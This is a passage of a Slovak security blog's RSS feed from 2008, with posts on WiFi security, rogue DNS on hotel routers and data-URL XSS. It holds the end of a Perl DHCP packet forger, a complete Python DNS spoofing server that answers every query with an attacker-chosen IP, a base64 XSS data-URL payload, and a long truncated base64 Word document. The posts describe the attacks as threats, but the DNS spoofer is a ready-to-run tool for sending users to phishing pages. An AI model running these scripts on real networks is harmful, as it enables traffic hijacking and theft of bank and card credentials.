=&gt; $mac,&lt;br /&gt;DHO_DHCP_MESSAGE_TYPE() =&gt; DHCPACK(),&lt;br /&gt;);&lt;br /&gt;&lt;br /&gt;$handle = IO::Socket::INET-&gt;new(&lt;br /&gt;Proto =&gt; &#39;udp&#39;,&lt;br /&gt;Broadcast =&gt; 1,&lt;br /&gt;PeerPort =&gt; &#39;67&#39;,&lt;br /&gt;LocalPort =&gt; &#39;68&#39;,&lt;br /&gt;PeerAddr =&gt; &#39;255.255.255.255&#39;&lt;br /&gt;) or die &quot;Socket: $@&quot;;&lt;br /&gt;&lt;br /&gt;$handle-&gt;send($request-&gt;serialize()) or die &quot;Error sending broadcast request:$!\n&quot;;&lt;br /&gt;$handle-&gt;send($ack-&gt;serialize()) or die &quot;Error sending broadcast act:$!\n&quot;;&lt;/name&gt;&lt;/domain&gt;&lt;/ip&gt;&lt;/mac&gt;&lt;/code&gt;&lt;/pre&gt;</description><link>http://webprotected.blogspot.com/2008/04/rooting-verejnej-wifi-siete.html</link><author>noreply@blogger.com (Unknown)</author><thr:total>0</thr:total></item><item><guid isPermaLink="false">tag:blogger.com,1999:blog-464579124419695192.post-2677906121350838150</guid><pubDate>Mon, 31 Mar 2008 16:36:00 +0000</pubDate><atom:updated>2008-07-29T11:57:12.777+02:00</atom:updated><category domain="http://www.blogger.com/atom/ns#">Security</category><category domain="http://www.blogger.com/atom/ns#">WiFi</category><title>WiFi Bezpečnosť</title><description>&lt;span style=&quot;font-family:arial;&quot;&gt;J&lt;/span&gt;&lt;span class=&quot;messageIn&quot;  style=&quot;font-family:arial;&quot;&gt;edno zo základných pravidiel, o ktorom sa nedočítate v žiadnej bezpečnostnej príručke ani knihe o bezpečnosti a ktoré sa môžete naučit  len z praxe je, že všetko je v symbióze&lt;/span&gt;&lt;span style=&quot;font-family:arial;&quot;&gt;&lt;span style=&quot;font-family:arial;&quot;&gt; &lt;/span&gt;. To znamená, že bezpečnostné modely individuálnych komponentov v systéme sú na seba vzájomne naviazané.&lt;br /&gt;&lt;br /&gt;Keď hovoríme o WiFi bezpečnosti, obyčajne zakopneme o vec ako je (za)kódovanie, WPA a WPA2, 802.11 autorizácia, klientské certifikáty, sieťová členitosť, atd.&lt;/span&gt;&lt;span class=&quot;hMessageIn&quot;  style=&quot;font-family:arial;&quot;&gt; Doposiaľ žiadna z týchto technológií neposkytuje  bezpečnosť ale skôr veci ako súkromie, verifikácia identity a autorizácia&lt;/span&gt;&lt;span style=&quot;font-family:arial;&quot;&gt;&lt;span style=&quot;font-family:arial;&quot;&gt;.&lt;/span&gt; Toto sú základné komponenty WiFi, ale v žiadnom prípade to neznamená komplexné riešenie všetkých problémov.&lt;br /&gt;&lt;br /&gt;&lt;span style=&quot;color: rgb(255, 0, 0); font-weight: bold;font-family:courier new;font-size:130%;&quot;  &gt;Fizické diery&lt;br /&gt;&lt;span style=&quot;font-size:100%;&quot;&gt;&lt;span style=&quot;color: rgb(0, 0, 0);&quot;&gt;&lt;span style=&quot;font-weight: bold;&quot;&gt;&lt;br /&gt;&lt;/span&gt;&lt;/span&gt;&lt;/span&gt;&lt;/span&gt;&lt;span style=&quot;color: rgb(255, 0, 0);font-family:arial;font-size:100%;&quot;  &gt;&lt;span style=&quot;color: rgb(0, 0, 0);&quot;&gt;Toto je jeden z najstarších trikov. Je to ako trójsky kôň v starovekom Grécku. Stratégia je veľmi prostá. Keď jeden nájde spôsob ako dostať fyzický prístup k budove, on/ona môže rozvinúť bezdrôtový prístup, ktorý bude neskôr využitý. A teraz, aký tvrdý je ten prístup?&lt;br /&gt;Ľahší ako si myslíte! Myslím na to, že spoločnosti uzatvárajú obchody. Ich budovy niesu neprekonateľné pevnosti .Mnohokrát fyzické diery sú skoro také jednoduché ako chodenie po vestibule a hľadanie nechráneného sieťového adaptéra.&lt;br /&gt;&lt;br /&gt;&lt;span style=&quot;font-weight: bold; color: rgb(255, 0, 0);font-size:130%;&quot; &gt;&lt;span style=&quot;font-family:courier new;&quot;&gt;Návštevníci WiFi&lt;br /&gt;&lt;br /&gt;&lt;/span&gt;&lt;/span&gt;&lt;span style=&quot;color: rgb(0, 0, 0);font-family:arial;font-size:100%;&quot;  &gt;Vaša WiFi sieť je pravdepodobne zabezpečená, ale aká je bezpečnosť &lt;/span&gt;vášho obchodného partnera? Spoločnosti majú nezabezpečené WiFi siete, ktoré sú špecifické tým, že sú navrhnuté len pre návštevníkov(hostí). Tieto siete sú celkom &quot;otvorené&quot; a majú niečo ako BlueSocket. Hostia vložia svoje vstupné heslá a sú tam.&lt;span style=&quot;font-family:arial;&quot;&gt; Žiaľ&lt;/span&gt;&lt;/span&gt;&lt;/span&gt;&lt;/span&gt;&lt;span class=&quot;messageIn&quot;  style=&quot;font-family:arial;&quot;&gt; ich celý traffic cestuje čistý a jasný vzduchom tak dobre ako ich POP3  prihlasovacie dáta a http sessions.&lt;/span&gt;&lt;br /&gt;&lt;span style=&quot;font-family:arial;&quot;&gt;&lt;span style=&quot;color: rgb(255, 0, 0);font-family:arial;font-size:100%;&quot;  &gt;&lt;span style=&quot;color: rgb(0, 0, 0);&quot;&gt;&lt;br /&gt;&lt;/span&gt;&lt;/span&gt;&lt;span style=&quot;color: rgb(255, 0, 0); font-weight: bold;font-family:courier new;font-size:130%;&quot;  &gt;&lt;span style=&quot;font-size:100%;&quot;&gt;&lt;span style=&quot;color: rgb(0, 0, 0);&quot;&gt;&lt;span style=&quot;font-weight: bold;&quot;&gt;&lt;/span&gt;&lt;/span&gt;&lt;/span&gt;&lt;/span&gt;&lt;/span&gt;</description><link>http://webprotected.blogspot.com/2008/03/wifi-bezpenos.html</link><author>noreply@blogger.com (Unknown)</author><thr:total>0</thr:total></item><item><guid isPermaLink="false">tag:blogger.com,1999:blog-464579124419695192.post-4184622257549139515</guid><pubDate>Mon, 31 Mar 2008 13:33:00 +0000</pubDate><atom:updated>2008-07-29T11:53:07.989+02:00</atom:updated><category domain="http://www.blogger.com/atom/ns#">Security</category><category domain="http://www.blogger.com/atom/ns#">WiFi</category><title>Owned WiFi</title><description>&lt;span style=&quot;font-family:arial;&quot;&gt;Posledných pár dní som sa začal zaujímať o pripojenie sa k wifi bez wep kľúča kde je útočník schopný zmeniť primárny DNS server na routery. Toto je v dnešnej dobe dosť závažný bezpečnostný problém ako útočník môže prísť k vašim detailom o kreditnej karte alebo nejakým &lt;/span&gt;&lt;span style=&quot;font-family:arial;&quot;&gt;iným rovnocenným informáciám.&lt;/span&gt;&lt;br /&gt;&lt;br /&gt;&lt;span style=&quot;font-family:arial;&quot;&gt;Predstavte si, že ste v hoteli spolu s vašim laptopom. Ste pripojení na wifi a nachádzate sa na front page google.com. Kompletná url je http://www.google.com a otázka znie, je táto stránka pravá(autentická)? Útočník by mohol mať prístup k routeru a zmeniť&lt;/span&gt;&lt;span style=&quot;font-family:arial;&quot;&gt; primárny DNS server prostredníctvom dostupných metód.&lt;/span&gt;&lt;br /&gt;&lt;br /&gt;&lt;span style=&quot;font-family:arial;&quot;&gt;Teoreticky by útočník mohol použiť hocijakú Ip adresu k &quot;naťahovaciemu triku&quot;, pokiaľ by DNS server bol spustený za UDP portom 53. No viacej užitočné by bolo, ak by napádateľ  mal pod kontrolou DNS server, tak môže ukázať užívateľovi to, čo by vidieť chcel.&lt;/span&gt;&lt;br /&gt;&lt;span style=&quot;font-family:arial;&quot;&gt;Príklad, užívateľ môže napísať webovú stránku banky a skončiť tak následovne v phisingovej stránke, ktorá môže byť vizuálne spravená úplne rovnako. Takže nič netušiaci užívateľ si pekne zadáva údaje priamo do loggeru útočníka. Je to veľká hrozba, ktorá môže ovplyvniť kohokoľvek kto nemá zabezpečený svoj systém.&lt;/span&gt;&lt;br /&gt;&lt;br /&gt;&lt;span style=&quot;font-family:arial;&quot;&gt;&lt;a href=&quot;http://www.gnucitizen.org/&quot;&gt;pdp&lt;/a&gt; vytvoril skript v Pythone, ktorý funguje ako prechodný DNS server a bude meniť všetky požiadavky na &quot;overené&quot;.&lt;br /&gt;&lt;/span&gt;&lt;br /&gt;&lt;code class=&quot;something&quot;&gt;# DNS Injection Server&lt;br /&gt;# Created By fazed&lt;br /&gt;# DNSQuery class adapted from Francisco Santos&#39;s&lt;br /&gt;# code. why re-invent the wheel?&lt;br /&gt;&lt;br /&gt;from socket import *&lt;br /&gt;&lt;br /&gt;class DNSQuery:&lt;br /&gt;def __init__(self, data):&lt;br /&gt;self.data=data&lt;br /&gt;self.domain=&#39;&#39;&lt;br /&gt;&lt;br /&gt;tipo = (ord(data[2]) &gt;&gt; 3) &amp;amp; 15&lt;br /&gt;if tipo == 0:&lt;br /&gt; ini=12&lt;br /&gt; lon=ord(data[ini])&lt;br /&gt; while lon != 0:&lt;br /&gt;   self.domain+=data[ini+1:ini+lon+1]+&#39;.&#39;&lt;br /&gt;   ini+=lon+1&lt;br /&gt;   lon=ord(data[ini])&lt;br /&gt;&lt;br /&gt;def respond(self, ip):&lt;br /&gt;packet=&#39;&#39;&lt;br /&gt;if self.domain:&lt;br /&gt; packet+=self.data[:2] + &quot;\x81\x80&quot;&lt;br /&gt; packet+=self.data[4:6] + self.data[4:6] + &#39;\x00\x00\x00\x00&#39;&lt;br /&gt; packet+=self.data[12:]&lt;br /&gt; packet+=&#39;\xc0\x0c&#39;&lt;br /&gt; packet+=&#39;\x00\x01\x00\x01\x00\x00\x00\x3c\x00\x04&#39;&lt;br /&gt; packet+=str.join(&#39;&#39;,map(lambda x: chr(int(x)), ip.split(&#39;.&#39;)))&lt;br /&gt;return packet&lt;br /&gt;&lt;br /&gt;print &quot;:: DNS Injection Server Started ::&quot;&lt;br /&gt;sh = socket(AF_INET, SOCK_DGRAM)&lt;br /&gt;print &quot;Socket Handle Created..&quot;&lt;br /&gt;sh.bind((&#39;&#39;,53))&lt;br /&gt;print &quot;Socket Handle Bound To UDP Port 53&quot;&lt;br /&gt;ip = raw_input(&quot;IP to inject: &quot;)&lt;br /&gt;try:&lt;br /&gt;while 1:&lt;br /&gt;   data, addr = sh.recvfrom(1024)&lt;br /&gt;   print &quot;DNS Request From:&quot;, addr[0]&lt;br /&gt;   p = DNSQuery(data)&lt;br /&gt;   print &quot;Sending IP address:&quot;, ip&lt;br /&gt;   sh.sendto(p.respond(ip),addr)&lt;br /&gt;   print &quot;Response Sent..&quot;&lt;br /&gt;except KeyboardInterrupt:&lt;br /&gt;print &quot;:: DNS Injection Server Stoped ::&quot;&lt;br /&gt;sh.close()&lt;/code&gt;</description><link>http://webprotected.blogspot.com/2008/03/owned-wifi.html</link><author>noreply@blogger.com (Unknown)</author><thr:total>1</thr:total></item><item><guid isPermaLink="false">tag:blogger.com,1999:blog-464579124419695192.post-8927294672387509831</guid><pubDate>Sat, 29 Mar 2008 20:07:00 +0000</pubDate><atom:updated>2008-07-29T11:46:25.382+02:00</atom:updated><category domain="http://www.blogger.com/atom/ns#">Security</category><category domain="http://www.blogger.com/atom/ns#">XSS</category><title>Self-Contained XSS útoky</title><description>&lt;span style=&quot;;font-family:arial;font-size:100%;&quot;  &gt;Podstatou všetkých cross-site scripting (xss) útokov je ich &quot;neošetrená ukecanosť&quot;. V tom je krása každej aplikácie - či je vstup zraniteľný a či môže byť potencionálne využiteľný útočníkom k session stealingu, zhromaždovaniu dôležitých informácií, atd.&lt;br /&gt;&lt;br /&gt;&lt;a href=&quot;http://webprotected.blogspot.com/2008/02/xss_02.html&quot;&gt;XSS&lt;/a&gt; &lt;/span&gt;&lt;span class=&quot;hMessageIn&quot;  style=&quot;font-family:arial;&quot;&gt;útoky môžu byť perzistantné (trvalé) alebo neperzistatné (dočasné). Perzistatné útoky sú nebezpečnejšie, pretože je možné dlhšie infikovať užívateľov (a je  aplikovateľný na všetkých navštevníkov...nie je potrebné sociálne inžinierstvo).  Neperzistentný útok, i ked je menej nebezpečný, sa veľmi často využíva v  phishingu a taktiež je oveľa viac zaužívaní. No to už väčšina z vás predpokladám vedela a nemalo by to byť pre vás nič nové.&lt;br /&gt;&lt;br /&gt;Táto metóda môže byť úspešne použitá v obchádzaní mailových filtroch, xss filtroch, firewalloch alebo neošetrených funkciách. Výsledok Self-Contained XSS si môžete vyskúšať na tomto &lt;a href=&quot;data:text/html;base64,PHNjcmlwdD4KYWxlcnQoIkphIHNvbSBTZWxmLWNvbnRhaW5lZCBYU1MiKTsKPC9zY3JpcHQ+&quot;&gt;linku&lt;/a&gt;.&lt;br /&gt; Názov &quot;Self-Contained XSS&quot; vysvetľuje všetko. Je to &lt;/span&gt;Cross-site scripting&lt;span style=&quot;;font-family:arial;font-size:100%;&quot;  &gt; útok, ktorý nevyžaduje zraniteľnosť vstupu. Všetko potrebné je zahrnuté v url.&lt;/span&gt;&lt;span class=&quot;messageIn&quot;&gt; Hneď ako bude spustená url, zdroj (teda skript) bude  spustený.&lt;/span&gt;&lt;br /&gt;&lt;span style=&quot;;font-family:arial;font-size:100%;&quot;  &gt;&lt;br /&gt;Url musí mať prefix data: protokol a nasledovná špeciálna syntax. Je mnoho protokolov v moderných browseroch ako napríklad &lt;/span&gt;http:, https:, ftp:, about:, data:&lt;br /&gt;&lt;br /&gt;Dopad Self-contained XSS môže byť väčší ako si dokážete predstaviť. Táto technika umožňuje dinamické vytváranie binárnych súborov z JavaScriptu. JavaScriptový wormovia sú schopný vytvoriť DOC a PDF súbory, tie môžu obsahovať zlomyseľný obsah pre využitie rôznych &quot;overflow&quot; zraniteľností. Ako príklad uvediem Self-contained word dokument, ktorý je mimochodom v tomto prípade absolútne neškodný.&lt;br /&gt;&lt;pre style=&quot;font-family: arial;&quot; id=&quot;line73&quot;&gt;&lt;a href=&quot;data:application/msword;base64,0M8R4KGxGuEAAAAAAAAAAAAAAAAAAAAAPgADAP7/CQAGAAAAAAAAAAAAAAABAAAAKgAAAAAAAAAAEAAALAAAAAEAAAD+////AAAAACkAAAD////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////spcEAA2AJBAAA8BK/AAAAAAAAEAAAAAAABgAAFAgAAA4AYmpiastzy3MAAAAAAAAAAAAAAAAAAAAAAAAJBBYALhAAAKkZAQCpGQEAFAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAD//w8AAAAAAAAAAAD//w8AAAAAAAAAAAD//w8AAAAAAAAAAAAAAAAAAAAAAKQAAAAAAKgDAAAAAAAAqAMAAKgDAAAAAAAAqAMAAAAAAACoAwAAAAAAAKgDAAAAAAAAqAMAABQAAAAAAAAAAAAAALwDAAAAAAAA4AMAAAAAAADgAwAAAAAAAOADAAAAAAAA4AMAAAwAAADsAwAADAAAALwDAAAAAAAABwUAALYAAAAEBAAAAAAAAAQEAAAAAAAABAQAAAAAAAAEBAAAAAAAAAQEAAAAAAAABAQAAAAAAAAEBAAAAAAAAAQEAAAAAAAAhgQAAAIAAACIBAAAAAAAAIgEAAAAAAAAiAQAAAAAAACIBAAAAAAAAIgEAAAAAAAAiAQAACQAAAC9BQAAaAIAACUIAAA2AAAArAQAABUAAAAAAAAAAAAAAAAAAAAAAAAAqAMAAAAAAAAEBAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAEBAAAAAAAAAQEAAAAAAAABAQAAAAAAAAEBAAAAAAAAKwEAAAAAAAAAAAAAAAAAACoAwAAAAAAAKgDAAAAAAAABAQAAAAAAAAAAAAAAAAAAAQEAAAAAAAAwQQAABYAAABiBAAAAAAAAGIEAAAAAAAAYgQAAAAAAAAEBAAAIgAAAKgDAAAAAAAABAQAAAAAAACoAwAAAAAAAAQEAAAAAAAAhgQAAAAAAAAAAAAAAAAAAGIEAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAABAQAAAAAAACGBAAAAAAAAAAAAAAAAAAAYgQAAAAAAAAAAAAAAAAAAGIEAAAAAAAAqAMAAAAAAACoAwAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAYgQAAAAAAAAEBAAAAAAAAPgDAAAMAAAA8AC9gjfexgEAAAAAAAAAAOADAAAAAAAAJgQAAAoAAABiBAAAAAAAAAAAAAAAAAAAhgQAAAAAAADXBAAAMAAAAAcFAAAAAAAAYgQAAAAAAABbCAAAAAAAADAEAAAQAAAAWwgAAAAAAABiBAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAFsIAAAAAAAAAAAAAAAAAACoAwAAAAAAAGIEAAAkAAAABAQAAAAAAAAEBAAAAAAAAGIEAAAAAAAABAQAAAAAAAAEBAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAABAQAAAAAAAAEBAAAAAAAAAQEAAAAAAAArAQAAAAAAACsBAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAQAQAACIAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAQEAAAAAAAABAQAAAAAAAAEBAAAAAAAAAcFAAAAAAAABAQAAAAAAAAEBAAAAAAAAAQEAAAAAAAABAQAAAAAAAAAAAAAAAAAALwDAAAAAAAAvAMAAAAAAAC8AwAAJAAAAOADAAAAAAAAvAMAAAAAAAC8AwAAAAAAALwDAAAAAAAA4AMAAAAAAAC8AwAAAAAAALwDAAAAAAAAvAMAAAAAAACoAwAAAAAAAKgDAAAAAAAAqAMAAAAAAACoAwAAAAAAAKgDAAAAAAAAqAMAAAAAAAD/////AAAAAAIADAEAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAFRoaXMgaXMgYSBkb2N1bWVudC4NAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAYAABMIAAAUCAAA/PgAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAYWaAs1kAAABhZofDVHAAIABgAAFAgAAP0AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAABAAAAAQAGAAAUCAAA/gAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAACAQEBLAAxkGgBH7DQLyCw4D0hsAgHIrAIByOQoAUkkKAFJbAAABew0AIYsNACDJDQAgAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA